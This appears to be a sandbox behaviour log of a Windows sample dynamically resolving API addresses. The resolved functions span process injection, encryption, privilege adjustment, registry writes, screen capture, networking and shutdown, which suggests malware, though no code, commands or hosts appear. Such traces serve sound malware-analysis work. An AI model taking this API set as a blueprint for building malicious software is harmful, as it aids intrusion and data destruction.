Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVolumeNameForVolumeMountPointW, address_out = 0x759e052f True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OpenProcess, address_out = 0x759d1986 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileTime, address_out = 0x759d4407 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ReleaseMutex, address_out = 0x759d111e True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LeaveCriticalSection, address_out = 0x77cd2270 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x759d4950 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFileTime, address_out = 0x759eecbb True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RemoveDirectoryW, address_out = 0x75a544cf True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x759d1856 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExpandEnvironmentStringsW, address_out = 0x759d4173 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x759d1282 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindNextFileW, address_out = 0x759d54ee True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnterCriticalSection, address_out = 0x77cd22b0 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileAttributesW, address_out = 0x759d1b18 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindClose, address_out = 0x759d4442 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OpenEventW, address_out = 0x759d15d6 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTempPathW, address_out = 0x759ed4dc True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x759d11a9 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x759d14c9 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapCreate, address_out = 0x759d4a2d True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteProcessMemory, address_out = 0x759ed9e0 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileSizeEx, address_out = 0x759d59e2 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstFileW, address_out = 0x759d4435 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedExchange, address_out = 0x759d1462 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVolumeInformationW, address_out = 0x759ec860 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ReadFile, address_out = 0x759d3ed3 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateDirectoryW, address_out = 0x759d4259 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibrary, address_out = 0x759d34c8 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x759d34b0 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x759d1222 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryW, address_out = 0x759d492b True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Process32FirstW, address_out = 0x759f8baf True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Process32NextW, address_out = 0x759f896c True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x759d11c0 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x759f735f True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileW, address_out = 0x759d3f5c True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateMutexW, address_out = 0x759d424c True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ResetEvent, address_out = 0x759d16dd True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x759d1410 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetEvent, address_out = 0x759d16c5 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x759d10ff True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateEventW, address_out = 0x759d183e True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForSingleObject, address_out = 0x759d1136 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForMultipleObjects, address_out = 0x759d4220 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x759d110c True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x759d186e True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x758c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetIconInfo, address_out = 0x758e49ea True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x758c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DrawIcon, address_out = 0x758e8deb True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x758c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = LoadImageW, address_out = 0x758dfbd1 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x758c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetCursorPos, address_out = 0x758e1218 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x758c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DefWindowProcW, address_out = 0x77ce25dd True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x758c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CreateWindowExW, address_out = 0x758d8a29 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x758c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = UnregisterClassW, address_out = 0x758d9f84 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x758c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetKeyboardLayoutList, address_out = 0x758e2e69 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x758c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CharLowerA, address_out = 0x758e3e75 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x758c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CharToOemW, address_out = 0x75931a26 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x758c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = TranslateMessage, address_out = 0x758d7809 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x758c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = PeekMessageW, address_out = 0x758e05ba True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x758c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DispatchMessageW, address_out = 0x758d787b True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x758c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MsgWaitForMultipleObjects, address_out = 0x758e0b4a True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x758c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = RegisterClassExW, address_out = 0x758db17d True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x758c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetWindowLongA, address_out = 0x758e6110 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x758c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetWindowLongA, address_out = 0x758dd156 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x758c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CharUpperW, address_out = 0x758df350 True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x758c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DestroyWindow, address_out = 0x758d9a55 True 1
Fn
Module Load module_name = CRYPT32.dll, base_address = 0x76240000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\crypt32.dll, function = CryptImportPublicKeyInfo, address_out = 0x76256c0e True 1
Fn
Module Load module_name = CRYPT32.dll, base_address = 0x76240000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\crypt32.dll, function = CryptDecodeObjectEx, address_out = 0x7624d718 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegCloseKey, address_out = 0x7775469d True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetAce, address_out = 0x777545f0 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptEncrypt, address_out = 0x7776779b True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetSidSubAuthorityCount, address_out = 0x77750e0c True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = AllocateAndInitializeSid, address_out = 0x777540e6 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetSidSubAuthority, address_out = 0x77750e24 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = SetEntriesInAclW, address_out = 0x77752a66 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegCreateKeyExW, address_out = 0x777540fe True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptVerifySignatureW, address_out = 0x7774c54a True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = SetNamedSecurityInfoW, address_out = 0x77749fe2 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetNamedSecurityInfoW, address_out = 0x7774f4fd True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptCreateHash, address_out = 0x7774df4e True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptHashData, address_out = 0x7774df36 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = SetSecurityDescriptorSacl, address_out = 0x77754680 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegSetValueExW, address_out = 0x777514d6 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptDestroyHash, address_out = 0x7774df66 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = OpenProcessToken, address_out = 0x77754304 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = FreeSid, address_out = 0x7775412e True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = InitializeSecurityDescriptor, address_out = 0x77754620 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyExW, address_out = 0x7775468d True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptImportKey, address_out = 0x7774c532 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = ConvertStringSecurityDescriptorToSecurityDescriptorW, address_out = 0x77751f59 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = OpenThreadToken, address_out = 0x7775432c True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryValueExW, address_out = 0x777546ad True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptReleaseContext, address_out = 0x7774e124 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetTokenInformation, address_out = 0x7775431c True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptDestroyKey, address_out = 0x7774c51a True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = AdjustTokenPrivileges, address_out = 0x7775418e True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = SetSecurityDescriptorDacl, address_out = 0x7775415e True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetSecurityDescriptorSacl, address_out = 0x77754608 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = LookupPrivilegeValueW, address_out = 0x777541b3 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetLengthSid, address_out = 0x7775413b True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegDeleteValueW, address_out = 0x7774cf31 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegFlushKey, address_out = 0x7776773f True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegNotifyChangeKeyValue, address_out = 0x7774e15b True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryInfoKeyW, address_out = 0x777546e7 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegEnumKeyW, address_out = 0x7775445b True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = InitiateSystemShutdownExW, address_out = 0x7779db3a True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptAcquireContextW, address_out = 0x7774df14 True 1
Fn
Module Load module_name = SHELL32.dll, base_address = 0x76a70000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteW, address_out = 0x76a83c71 True 1
Fn
Module Load module_name = SHELL32.dll, base_address = 0x76a70000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteExW, address_out = 0x76a91e46 True 1
Fn
Module Load module_name = SHELL32.dll, base_address = 0x76a70000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = SHGetFolderPathW, address_out = 0x76af5708 True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x76370000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathFileExistsW, address_out = 0x763845bf True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x76370000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathIsURLW, address_out = 0x763855bf True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x76370000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathIsDirectoryEmptyW, address_out = 0x763acd81 True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x76370000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = StrCmpNIW, address_out = 0x76384745 True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x76370000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathRenameExtensionW, address_out = 0x763ad32a True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x76370000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = StrStrIW, address_out = 0x763846e9 True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x76370000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathMatchSpecW, address_out = 0x763886f7 True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x76370000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathCombineW, address_out = 0x7638c39c True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x76370000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathRemoveFileSpecW, address_out = 0x76383248 True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x76370000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathAddBackslashW, address_out = 0x7638c177 True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x76370000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = wvnsprintfW, address_out = 0x763b066c True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x76370000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathUnquoteSpacesW, address_out = 0x76385331 True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x76370000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathSkipRootW, address_out = 0x7639fbf5 True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x76370000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathFindExtensionW, address_out = 0x7638a1b9 True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x76370000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = SHDeleteValueW, address_out = 0x7637fcca True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x76370000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = wvnsprintfA, address_out = 0x7639edfe True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x76370000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathIsDirectoryW, address_out = 0x7637ff07 True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x76370000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathRemoveBackslashW, address_out = 0x76385c62 True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x76370000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = UrlUnescapeA, address_out = 0x7639c6fb True 1
Fn
Module Load module_name = SHLWAPI.dll, base_address = 0x76370000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shlwapi.dll, function = PathQuoteSpacesW, address_out = 0x763ace21 True 1
Fn
Module Load module_name = PSAPI.DLL, base_address = 0x75ad0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\psapi.dll, function = GetModuleFileNameExW, address_out = 0x75ad13f0 True 1
Fn
Module Load module_name = ole32.dll, base_address = 0x75ae0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CLSIDFromString, address_out = 0x75afe599 True 1
Fn
Module Load module_name = ole32.dll, base_address = 0x75ae0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoInitializeEx, address_out = 0x75b209ad True 1
Fn
Module Load module_name = ole32.dll, base_address = 0x75ae0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CreateStreamOnHGlobal, address_out = 0x75b0363b True 1
Fn
Module Load module_name = ole32.dll, base_address = 0x75ae0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoSetProxyBlanket, address_out = 0x75af5ea5 True 1
Fn
Module Load module_name = ole32.dll, base_address = 0x75ae0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoCreateInstance, address_out = 0x75b29d0b True 1
Fn
Module Load module_name = ole32.dll, base_address = 0x75ae0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoUninitialize, address_out = 0x75b286d3 True 1
Fn
Module Load module_name = GDI32.dll, base_address = 0x76950000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = DeleteObject, address_out = 0x76965689 True 1
Fn
Module Load module_name = GDI32.dll, base_address = 0x76950000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = GetDeviceCaps, address_out = 0x76964de0 True 1
Fn
Module Load module_name = GDI32.dll, base_address = 0x76950000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CreateDCW, address_out = 0x7696e743 True 1
Fn
Module Load module_name = GDI32.dll, base_address = 0x76950000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CreateCompatibleDC, address_out = 0x769654f4 True 1
Fn
Module Load module_name = GDI32.dll, base_address = 0x76950000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = SelectObject, address_out = 0x76964f70 True 1
Fn
Module Load module_name = GDI32.dll, base_address = 0x76950000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = CreateCompatibleBitmap, address_out = 0x76965f49 True 1
Fn
Module Load module_name = GDI32.dll, base_address = 0x76950000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = BitBlt, address_out = 0x76965ea6 True 1
Fn
Module Load module_name = GDI32.dll, base_address = 0x76950000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\gdi32.dll, function = DeleteDC, address_out = 0x769658b3 True 1
Fn
Module Load module_name = WININET.dll, base_address = 0x75f20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetConnectA, address_out = 0x75f449e9 True 1
Fn
Module Load module_name = WININET.dll, base_address = 0x75f20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetReadFile, address_out = 0x75f3b406 True 1
Fn
Module Load module_name = WININET.dll, base_address = 0x75f20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = HttpQueryInfoA, address_out = 0x75f3a33e True 1
Fn
Module Load module_name = WININET.dll, base_address = 0x75f20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetQueryOptionA, address_out = 0x75f31b56 True 1
Fn
Module Load module_name = WININET.dll, base_address = 0x75f20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = HttpOpenRequestA, address_out = 0x75f44c7d True 1
Fn
Module Load module_name = WININET.dll, base_address = 0x75f20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetCrackUrlA, address_out = 0x75f2d075 True 1
Fn
Module Load module_name = WININET.dll, base_address = 0x75f20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetSetOptionA, address_out = 0x75f375e8 True 1
Fn
Module Load module_name = WININET.dll, base_address = 0x75f20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetOpenA, address_out = 0x75f4f18e True 1
Fn
Module Load module_name = WININET.dll, base_address = 0x75f20000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\wininet.dll, function = InternetCloseHandle, address_out = 0x75f3ab49 True 1
Fn
